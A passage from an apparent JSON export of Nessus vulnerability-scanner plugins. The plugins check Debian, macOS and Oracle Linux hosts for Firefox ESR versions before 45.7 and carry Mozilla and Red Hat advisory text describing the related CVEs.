reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-lij\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-lt\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-lv\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-mai\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-mk\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ml\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-mr\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ms\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-nb-no\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-nl\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-nn-no\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-or\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-pa-in\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-pl\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-pt-br\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-pt-pt\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-rm\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ro\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ru\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-si\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-sk\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-sl\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-son\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-sq\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-sr\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-sv-se\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-ta\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-te\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-th\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-tr\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-uk\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-uz\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-vi\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-xh\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-zh-cn\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"firefox-esr-l10n-zh-tw\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-dbg\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-dev\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ach\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-af\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-all\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-an\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ar\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-as\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ast\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-az\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-be\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-bg\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-bn-bd\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-bn-in\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-br\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-bs\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ca\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-cs\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-cy\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-da\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-de\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-dsb\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-el\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-en-gb\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-en-za\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-eo\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-es-ar\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-es-cl\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-es-es\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-es-mx\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-et\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-eu\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-fa\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ff\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-fi\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-fr\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-fy-nl\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ga-ie\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-gd\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-gl\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-gn\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-gu-in\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-he\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-hi-in\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-hr\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-hsb\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-hu\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-hy-am\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-id\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-is\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-it\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ja\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-kk\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-km\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-kn\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ko\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-lij\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-lt\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-lv\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-mai\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-mk\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ml\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-mr\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ms\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-nb-no\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-nl\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-nn-no\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-or\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-pa-in\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-pl\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-pt-br\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-pt-pt\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-rm\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ro\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ru\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-si\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-sk\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-sl\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-son\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-sq\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-sr\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-sv-se\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-ta\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-te\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-th\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-tr\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-uk\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-uz\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-vi\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-xh\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-zh-cn\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceweasel-l10n-zh-tw\", reference:\"45.7.0esr-1~deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:29:12", "bulletinFamily": "scanner", "description": "The version of Mozilla Firefox ESR installed on the remote macOS or Mac OS X host is 45.x prior to 45.7. It is, therefore, affected by the following vulnerabilities :\n\n - Mozilla developers and community members Christian Holler, Gary Kwong, Andre Bargull, Jan de Mooij, Tom Schuster, and Oriol reported memory safety bugs present in Firefox 50.1 and Firefox ESR 45.6. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code.\n (CVE-2017-5373)\n\n - JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. (CVE-2017-5375)\n\n - Use-after-free while manipulating XSL in XSLT documents (CVE-2017-5376)\n\n - Hashed codes of JavaScript objects are shared between pages. This allows for pointer leaks because an object's address can be discovered through hash codes, and also allows for data leakage of an object's content using these hash codes. (CVE-2017-5378)\n\n - A potential use-after-free found through fuzzing during DOM manipulation of SVG content. (CVE-2017-5380)\n\n - URLs containing certain unicode glyphs for alternative hyphens and quotes do not properly trigger punycode display, allowing for domain name spoofing attacks in the location bar. (CVE-2017-5383)\n\n - WebExtension scripts can use the 'data:' protocol to affect pages loaded by other web extensions using this protocol, leading to potential data disclosure or privilege escalation in affected extensions.\n (CVE-2017-5386)\n\n - The JSON viewer in the Developer Tools uses insecure methods to create a communication channel for copying and viewing JSON or HTTP headers data, allowing for potential privilege escalation. (CVE-2017-5390)\n\n - A use-after-free vulnerability in the Media Decoder when working with media files when some events are fired after the media elements are freed from memory.\n (CVE-2017-5396)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Mozilla security advisories.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-07-14T00:00:00", "id": "MACOSX_FIREFOX_45_7_ESR.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96773", "published": "2017-01-25T00:00:00", "title": "Mozilla Firefox ESR 45.x < 45.7 Multiple Vulnerabilities (macOS)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96773);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/07/14 1:59:37\");\n\n script_cve_id(\n \"CVE-2017-5373\",\n \"CVE-2017-5375\",\n \"CVE-2017-5376\",\n \"CVE-2017-5378\",\n \"CVE-2017-5380\",\n \"CVE-2017-5383\",\n \"CVE-2017-5386\",\n \"CVE-2017-5390\",\n \"CVE-2017-5396\"\n );\n script_bugtraq_id(\n 95757,\n 95758,\n 95762,\n 95769\n );\n script_xref(name:\"MFSA\", value:\"2017-02\");\n\n script_name(english:\"Mozilla Firefox ESR 45.x < 45.7 Multiple Vulnerabilities (macOS)\");\n script_summary(english:\"Checks the version of Firefox.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote macOS or Mac OS X host contains a web browser that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Mozilla Firefox ESR installed on the remote macOS or\nMac OS X host is 45.x prior to 45.7. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - Mozilla developers and community members Christian\n Holler, Gary Kwong, Andre Bargull, Jan de Mooij, Tom\n Schuster, and Oriol reported memory safety bugs present\n in Firefox 50.1 and Firefox ESR 45.6. Some of these\n bugs showed evidence of memory corruption and we\n presume that with enough effort that some of these\n could be exploited to run arbitrary code.\n (CVE-2017-5373)\n\n - JIT code allocation can allow for a bypass of ASLR and\n DEP protections leading to potential memory corruption\n attacks. (CVE-2017-5375)\n\n - Use-after-free while manipulating XSL in XSLT documents\n (CVE-2017-5376)\n\n - Hashed codes of JavaScript objects are shared between\n pages. This allows for pointer leaks because an object's\n address can be discovered through hash codes, and also\n allows for data leakage of an object's content using\n these hash codes. (CVE-2017-5378)\n\n - A potential use-after-free found through fuzzing during\n DOM manipulation of SVG content. (CVE-2017-5380)\n\n - URLs containing certain unicode glyphs for alternative\n hyphens and quotes do not properly trigger punycode\n display, allowing for domain name spoofing attacks in\n the location bar. (CVE-2017-5383)\n\n - WebExtension scripts can use the 'data:' protocol to\n affect pages loaded by other web extensions using this\n protocol, leading to potential data disclosure or\n privilege escalation in affected extensions.\n (CVE-2017-5386)\n\n - The JSON viewer in the Developer Tools uses insecure\n methods to create a communication channel for copying\n and viewing JSON or HTTP headers data, allowing for\n potential privilege escalation. (CVE-2017-5390)\n\n - A use-after-free vulnerability in the Media Decoder\n when working with media files when some events are\n fired after the media elements are freed from memory.\n (CVE-2017-5396)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Mozilla security advisories.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2017-02/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1285833\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1285960\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1297361\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1311687\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1312001\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1319070\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1322107\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1322315\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1322420\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1323338\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1324716\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1325200\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1325877\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1325938\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1328251\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1328834\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1329403\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1330769\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=1331058\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Firefox ESR version 45.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox_esr\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_firefox_installed.nasl\");\n script_require_keys(\"MacOSX/Firefox/Installed\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nkb_base = \"MacOSX/Firefox\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\n\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\n\nis_esr = get_kb_item(kb_base+\"/is_esr\");\nif (isnull(is_esr)) audit(AUDIT_NOT_INST, \"Mozilla Firefox ESR\");\n\nmozilla_check_version(product:'firefox', version:version, path:path, esr:TRUE, fix:'45.7', min:'45.0', severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:29:13", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2017:0190 :\n\nAn update for firefox is now available for Red Hat Enterprise Linux 5, Red Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\n[Updated 21 February 2017] This advisory has been updated to include Firefox packages for the PPC and S390 architectures that were previously omitted. For this revised update, packages for all architectures were rebuilt. The rebuilt packages do not contain any new code changes.\n\nMozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.7.0 ESR.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378, CVE-2017-5380, CVE-2017-5383, CVE-2017-5386, CVE-2017-5390, CVE-2017-5396)\n\nRed Hat would like to thank the Mozilla project for reporting these issues. Upstream acknowledges Jann Horn, Filipe Gomes, Muneaki Nishimura, Nils, Armin Razmjou, Christian Holler, Gary Kwong, Andre Bargull, Jan de Mooij, Tom Schuster, Oriol, Rh0, Nicolas Gregoire, and Jerri Rice as the original reporters.", "modified": "2018-09-05T00:00:00", "id": "ORACLELINUX_ELSA-2017-0190.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96789", "published": "2017-01-26T00:00:00", "title": "Oracle Linux 5 / 6 / 7 : firefox (ELSA-2017-0190)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:0190 and \n# Oracle Linux Security Advisory ELSA-2017-0190 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96789);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2018/09/05 15:02:26\");\n\n script_cve_id(\"CVE-2017-5373\", \"CVE-2017-5375\", \"CVE-2017-5376\", \"CVE-2017-5378\", \"CVE-2017-5380\", \"CVE-2017-5383\", \"CVE-2017-5386\", \"CVE-2017-5390\", \"CVE-2017-5396\");\n script_xref(name:\"RHSA\", value:\"2017:0190\");\n\n script_name(english:\"Oracle Linux 5 / 6 / 7 : firefox (ELSA-2017-0190)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:0190 :\n\nAn update for firefox is now available for Red Hat Enterprise Linux 5,\nRed Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\n[Updated 21 February 2017] This advisory has been updated to include\nFirefox packages for the PPC and S390 architectures that were\npreviously omitted. For this revised update, packages for all\narchitectures were rebuilt. The rebuilt packages do not contain any\nnew code changes.\n\nMozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.7.0 ESR.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web\ncontent. A web page containing malicious content could cause Firefox\nto crash or, potentially, execute arbitrary code with the privileges\nof the user running Firefox. (CVE-2017-5373, CVE-2017-5375,\nCVE-2017-5376, CVE-2017-5378, CVE-2017-5380, 